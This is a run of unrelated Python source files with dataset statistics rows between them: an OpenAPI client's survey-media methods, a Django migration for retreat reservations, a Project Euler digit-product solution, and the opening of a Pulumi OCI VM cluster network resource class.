be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SurveyMedia
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['edit_survey_media_dto'] = \
edit_survey_media_dto
return self.surveys_controller_update_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_upload(
self,
site_id,
**kwargs
):
"""Uploads a new survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_upload(site_id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
Keyword Args:
file (file_type): The image to upload (image/jpeg, image/png, image/tiff). Max size: 50MB. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
return self.surveys_controller_upload_endpoint.call_with_http_info(**kwargs)
| 35.859126 | 113 | 0.490624 | 4,833 | 51,673 | 4.985309 | 0.045313 | 0.024902 | 0.021582 | 0.022412 | 0.952187 | 0.941894 | 0.923259 | 0.908525 | 0.903005 | 0.895202 | 0 | 0.00212 | 0.425019 | 51,673 | 1,440 | 114 | 35.884028 | 0.808825 | 0.365858 | 0 | 0.694154 | 1 | 0 | 0.229214 | 0.062925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011482 | false | 0 | 0.011482 | 0 | 0.034447 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0b1983b2f56e1e5dfc3d93987b20a3d37a053b1a | 16,230 | py | Python | retirement/migrations/0001_initial.py | Jerome-Celle/Blitz-API | 7dfb7b837ed47b11afcfaa5f5aee831c1aa4e5e0 | [
"MIT"
] | 3 | 2019-10-22T00:16:49.000Z | 2021-07-15T07:44:43.000Z | retirement/migrations/0001_initial.py | Jerome-Celle/Blitz-API | 7dfb7b837ed47b11afcfaa5f5aee831c1aa4e5e0 | [
"MIT"
] | 1,183 | 2018-04-19T18:40:30.000Z | 2022-03-31T21:05:05.000Z | retirement/migrations/0001_initial.py | Jerome-Celle/Blitz-API | 7dfb7b837ed47b11afcfaa5f5aee831c1aa4e5e0 | [
"MIT"
] | 12 | 2018-04-17T19:16:42.000Z | 2022-01-27T00:19:59.000Z | # Generated by Django 2.0.8 on 2018-12-12 17:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('store', '0010_custompayment_historicalcustompayment'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalPicture',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('picture', models.TextField(max_length=100, verbose_name='picture')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Picture',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalReservation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('deleted', models.DateTimeField(editable=False, null=True)),
('is_active', models.BooleanField(verbose_name='Active')),
('cancelation_reason', models.CharField(blank=True, choices=[('U', 'User canceled'), ('RD', 'Retirement deleted'), ('RM', 'Retirement modified')], max_length=100, null=True, verbose_name='Cancelation reason')),
('cancelation_action', models.CharField(blank=True, choices=[('R', 'Refund'), ('E', 'Exchange'), ('N', 'None')], max_length=100, null=True, verbose_name='Cancelation action')),
('cancelation_date', models.DateTimeField(blank=True, null=True, verbose_name='Cancelation date')),
('is_present', models.BooleanField(default=False, verbose_name='Present')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical reservation',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalRetirement',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('country', models.CharField(max_length=45, verbose_name='Country')),
('country_fr', models.CharField(max_length=45, null=True, verbose_name='Country')),
('country_en', models.CharField(max_length=45, null=True, verbose_name='Country')),
('state_province', models.CharField(max_length=55, verbose_name='State/Province')),
('state_province_fr', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('state_province_en', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('city', models.CharField(max_length=50, verbose_name='City')),
('city_fr', models.CharField(max_length=50, null=True, verbose_name='City')),
('city_en', models.CharField(max_length=50, null=True, verbose_name='City')),
('address_line1', models.CharField(max_length=45, verbose_name='Address line 1')),
('address_line1_fr', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line1_en', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line2', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_fr', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_en', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('postal_code', models.CharField(max_length=10, verbose_name='Postal code')),
('latitude', models.FloatField(blank=True, null=True, verbose_name='Latitude')),
('longitude', models.FloatField(blank=True, null=True, verbose_name='Longitude')),
('timezone', models.CharField(blank=True, max_length=100, null=True, verbose_name='Timezone')),
('deleted', models.DateTimeField(editable=False, null=True)),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('details', models.CharField(max_length=1000, verbose_name='Details')),
('details_fr', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('details_en', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('seats', models.IntegerField(verbose_name='Seats')),
('activity_language', models.CharField(blank=True, choices=[('EN', 'English'), ('FR', 'French'), ('B', 'Bilingual')], max_length=100, null=True, verbose_name='Activity language')),
('price', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Price')),
('start_time', models.DateTimeField(verbose_name='Start time')),
('end_time', models.DateTimeField(verbose_name='End time')),
('min_day_refund', models.PositiveIntegerField(verbose_name='Minimum days before the event for refund')),
('refund_rate', models.PositiveIntegerField(verbose_name='Refund rate')),
('min_day_exchange', models.PositiveIntegerField(verbose_name='Minimum days before the event for exchange')),
('is_active', models.BooleanField(verbose_name='Active')),
('email_content', models.TextField(blank=True, max_length=1000, null=True, verbose_name='Email content')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Retirement',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Picture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('picture', models.ImageField(upload_to='retirements', verbose_name='picture')),
],
options={
'verbose_name': 'Picture',
'verbose_name_plural': 'Pictures',
},
),
migrations.CreateModel(
name='Reservation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('deleted', models.DateTimeField(editable=False, null=True)),
('is_active', models.BooleanField(verbose_name='Active')),
('cancelation_reason', models.CharField(blank=True, choices=[('U', 'User canceled'), ('RD', 'Retirement deleted'), ('RM', 'Retirement modified')], max_length=100, null=True, verbose_name='Cancelation reason')),
('cancelation_action', models.CharField(blank=True, choices=[('R', 'Refund'), ('E', 'Exchange'), ('N', 'None')], max_length=100, null=True, verbose_name='Cancelation action')),
('cancelation_date', models.DateTimeField(blank=True, null=True, verbose_name='Cancelation date')),
('is_present', models.BooleanField(default=False, verbose_name='Present')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Retirement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=45, verbose_name='Country')),
('country_fr', models.CharField(max_length=45, null=True, verbose_name='Country')),
('country_en', models.CharField(max_length=45, null=True, verbose_name='Country')),
('state_province', models.CharField(max_length=55, verbose_name='State/Province')),
('state_province_fr', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('state_province_en', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('city', models.CharField(max_length=50, verbose_name='City')),
('city_fr', models.CharField(max_length=50, null=True, verbose_name='City')),
('city_en', models.CharField(max_length=50, null=True, verbose_name='City')),
('address_line1', models.CharField(max_length=45, verbose_name='Address line 1')),
('address_line1_fr', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line1_en', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line2', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_fr', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_en', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('postal_code', models.CharField(max_length=10, verbose_name='Postal code')),
('latitude', models.FloatField(blank=True, null=True, verbose_name='Latitude')),
('longitude', models.FloatField(blank=True, null=True, verbose_name='Longitude')),
('timezone', models.CharField(blank=True, max_length=100, null=True, verbose_name='Timezone')),
('deleted', models.DateTimeField(editable=False, null=True)),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('details', models.CharField(max_length=1000, verbose_name='Details')),
('details_fr', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('details_en', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('seats', models.IntegerField(verbose_name='Seats')),
('activity_language', models.CharField(blank=True, choices=[('EN', 'English'), ('FR', 'French'), ('B', 'Bilingual')], max_length=100, null=True, verbose_name='Activity language')),
('price', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Price')),
('start_time', models.DateTimeField(verbose_name='Start time')),
('end_time', models.DateTimeField(verbose_name='End time')),
('min_day_refund', models.PositiveIntegerField(verbose_name='Minimum days before the event for refund')),
('refund_rate', models.PositiveIntegerField(verbose_name='Refund rate')),
('min_day_exchange', models.PositiveIntegerField(verbose_name='Minimum days before the event for exchange')),
('is_active', models.BooleanField(verbose_name='Active')),
('email_content', models.TextField(blank=True, max_length=1000, null=True, verbose_name='Email content')),
('exclusive_memberships', models.ManyToManyField(blank=True, related_name='retirements', to='store.Membership', verbose_name='Memberships')),
('users', models.ManyToManyField(blank=True, related_name='retirements', through='retirement.Reservation', to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Retirement',
'verbose_name_plural': 'Retirements',
},
),
migrations.AddField(
model_name='reservation',
name='retirement',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reservations', to='retirement.Retirement', verbose_name='Retirement'),
),
migrations.AddField(
model_name='reservation',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='retirement_reservations', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AddField(
model_name='picture',
name='retirement',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='pictures', to='retirement.Retirement', verbose_name='Retirement'),
),
migrations.AddField(
model_name='historicalreservation',
name='retirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='retirement.Retirement'),
),
migrations.AddField(
model_name='historicalreservation',
name='user',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpicture',
name='retirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='retirement.Retirement'),
),
]
| 72.455357 | 226 | 0.623783 | 1,731 | 16,230 | 5.635471 | 0.099365 | 0.119528 | 0.081497 | 0.097386 | 0.905382 | 0.903537 | 0.897693 | 0.872886 | 0.865095 | 0.865095 | 0 | 0.017295 | 0.223352 | 16,230 | 223 | 227 | 72.780269 | 0.756605 | 0.002773 | 0 | 0.805556 | 1 | 0 | 0.204968 | 0.01965 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018519 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9bcf0222836d09cbf1401ecba9eba1b2090f6058 | 2,665 | py | Python | exercises/project_euler_solutions/problem_8.py | leonel-123/python-fundamentals | 1ce9f666449866a13147d4f3a774c43f9107da41 | [
"MIT"
] | null | null | null | exercises/project_euler_solutions/problem_8.py | leonel-123/python-fundamentals | 1ce9f666449866a13147d4f3a774c43f9107da41 | [
"MIT"
] | null | null | null | exercises/project_euler_solutions/problem_8.py | leonel-123/python-fundamentals | 1ce9f666449866a13147d4f3a774c43f9107da41 | [
"MIT"
] | null | null | null | """
problem 8:
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
l = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
# print(len(l))
def adjacent_digits(num):
init= 0
n = 1
while True:
try:
for k in l[init:num]:
n *= int(k)
yield n
n = 1
init += 1
num += 1
except:
break
max_product = max(list(adjacent_digits(13)))
print(max_product)
| 38.071429 | 1,006 | 0.876548 | 112 | 2,665 | 20.848214 | 0.598214 | 0.023983 | 0.013705 | 0.016274 | 0.051392 | 0.051392 | 0.051392 | 0.051392 | 0.051392 | 0.051392 | 0 | 0.846862 | 0.103189 | 2,665 | 69 | 1,007 | 38.623188 | 0.12887 | 0.4803 | 0 | 0.125 | 0 | 0 | 0.737463 | 0.737463 | 0 | 1 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.0625 | 0.0625 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
50020332415527bea2061f889027b7dcbb8a8e7d | 40,740 | py | Python | sdk/python/pulumi_oci/database/vm_cluster_network.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/database/vm_cluster_network.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/database/vm_cluster_network.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VmClusterNetworkArgs', 'VmClusterNetwork']
@pulumi.input_type
class VmClusterNetworkArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
display_name: pulumi.Input[str],
exadata_infrastructure_id: pulumi.Input[str],
scans: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]],
vm_networks: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a VmClusterNetwork resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]] scans: (Updatable) The SCAN details.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]] vm_networks: (Updatable) Details of the client and backup networks.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "exadata_infrastructure_id", exadata_infrastructure_id)
pulumi.set(__self__, "scans", scans)
pulumi.set(__self__, "vm_networks", vm_networks)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if dns is not None:
pulumi.set(__self__, "dns", dns)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if ntps is not None:
pulumi.set(__self__, "ntps", ntps)
if validate_vm_cluster_network is not None:
pulumi.set(__self__, "validate_vm_cluster_network", validate_vm_cluster_network)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> pulumi.Input[str]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@exadata_infrastructure_id.setter
def exadata_infrastructure_id(self, value: pulumi.Input[str]):
pulumi.set(self, "exadata_infrastructure_id", value)
@property
@pulumi.getter
def scans(self) -> pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@scans.setter
def scans(self, value: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]):
pulumi.set(self, "scans", value)
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
@vm_networks.setter
def vm_networks(self, value: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]):
pulumi.set(self, "vm_networks", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@dns.setter
def dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def ntps(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@ntps.setter
def ntps(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ntps", value)
@property
@pulumi.getter(name="validateVmClusterNetwork")
def validate_vm_cluster_network(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "validate_vm_cluster_network")
@validate_vm_cluster_network.setter
def validate_vm_cluster_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "validate_vm_cluster_network", value)
@pulumi.input_type
class _VmClusterNetworkState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_cluster_id: Optional[pulumi.Input[str]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]] = None):
"""
Input properties used for looking up and filtering VmClusterNetwork resources.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
